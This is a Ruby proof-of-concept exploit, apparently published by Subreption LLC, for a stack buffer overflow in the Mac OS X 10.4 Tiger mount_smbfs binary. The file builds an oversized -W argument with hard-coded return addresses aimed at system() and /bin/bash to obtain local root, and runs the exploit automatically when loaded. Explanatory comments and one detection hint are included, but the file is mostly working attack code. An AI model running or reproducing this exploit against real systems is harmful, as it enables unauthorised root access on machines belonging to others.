# Copyright (C) 2007-2008 Subreption LLC. All rights reserved.
# Visit http://blog.subreption.com for exploit development notes.
#
# References:
# http://static.subreption.com/public/exploits/mount_smbfs_root.c
#
# Version: 1.0a (+tiger_x86)
#
# Distributed under the terms of the Subreption Open Source License v1.0
# http://static.subreption.com/public/documents/subreption-sosl-1.0.txt
#
module AppleOSX
  # Proof of concept for the stack buffer overflow in the Mac OS X 10.4.10-11
  # (Tiger) mount_smbfs binary, reached through an oversized -W argument.
  # The class does two things only: it builds the argument string
  # (make_payload) and replaces the current process with mount_smbfs
  # (exploit). Every address is hard-coded for the x86 Tiger build named in
  # the banner at the bottom of this file; on any other build the values
  # have no meaning and the target is expected to just crash.
  #
  # From a defensive angle, the observable artifact is an execution of
  # /sbin/mount_smbfs whose -W argument is over 1 KB long (the script prints
  # the exact size, padding + 28 bytes, before exec'ing).
  class SMBFSMountLocalRoot
    #
    # (gdb) x/12x $esp
    # 0xbfffe830: 0x5a5a5a5a 0x00000000 0xbffff441 0x00000002
    # 0xbfffe840: 0x00000002 0x00000000 0x01800000 0x9080eaf1
    # 0xbfffe850: 0x00300dd0 0x00000012 0x00000000 0xffffffff
    #
    # 0x9080eaf1 <_CFProcessPath+17>: 0x4de3838b
    # 0xbffff441: 'A' ...
    # 0xbffff875: "/bin/bash"
    #
    # Build the -W argument: `padding` filler bytes followed by seven
    # 32-bit little-endian words (pack "V"). The per-line labels below are the
    # original author's description of which saved slot each word lands in;
    # presumably `padding` is the distance to the first of those slots on the
    # targeted build.
    #
    # padding - number of filler bytes before the packed words (default 1040).
    #
    # Requires @ret_addr to have been set by initialize; if it is nil,
    # `[nil].pack("V")` raises TypeError.
    #
    # Returns the payload String (the result of the final `<<`).
    def make_payload(padding = 1040)
      payload = ("A" * padding)
      payload << [0xcafecafe].pack("V") # ebx
      payload << [0xdefacedd].pack("V") # esi
      payload << [0xfeedface].pack("V") # edi
      payload << [0xdeadbeef].pack("V") # ebp+0
      payload << [@ret_addr].pack("V") # eip
      payload << [0xa11b06d1].pack("V") # saved eip, dyld_stub_exit()
      payload << [0xbffff8fd].pack("V") # SHELL=/bin/bash
    end

    # Build the default-size payload, report its length, and exec
    # /sbin/mount_smbfs with it as the -W value. `exec` is given a single
    # string, so Ruby hands the command line to the shell; on success exec
    # never returns, so nothing after it in this process runs.
    def exploit
      payload = make_payload(1040)
      puts "Payload size: #{payload.size} bytes"
      exec "/sbin/mount_smbfs -W " + payload
    end

    # Select the return address from the architecture prefix of RUBY_PLATFORM.
    # Only "i686" is mapped; anything else - including a non-darwin platform,
    # where the scan yields nil - raises a RuntimeError before any payload is
    # built.
    #
    # NOTE(review): the check keys on the interpreter's architecture only, not
    # on the OS release, so the 10.4.10-11 requirement stated in the banner is
    # not enforced anywhere in this script.
    def initialize
      @arch = RUBY_PLATFORM.scan(/(.+?)-darwin/).flatten[0]
      case @arch
      when "i686"
        @ret_addr = 0xa0be2280 # to system() dyld stub
      else
        raise "Only x86 is currently supported in this public version."
      end
      puts "Target architecture: #{@arch} return address: " + sprintf("0x%x", @ret_addr)
    end
  end
end

# Script entry point: print the banner, construct the object (which performs
# the architecture check and may raise), then exec the target. This runs at
# load time, so merely requiring this file executes it.
puts "Mac OS X 10.4.10-11 (Tiger) mount_smbfs Stack Buffer Overflow exploit"
puts "Copyright (C) 2007-2008, Subreption LLC. All rights reserved."
test_run = AppleOSX::SMBFSMountLocalRoot.new()
test_run.exploit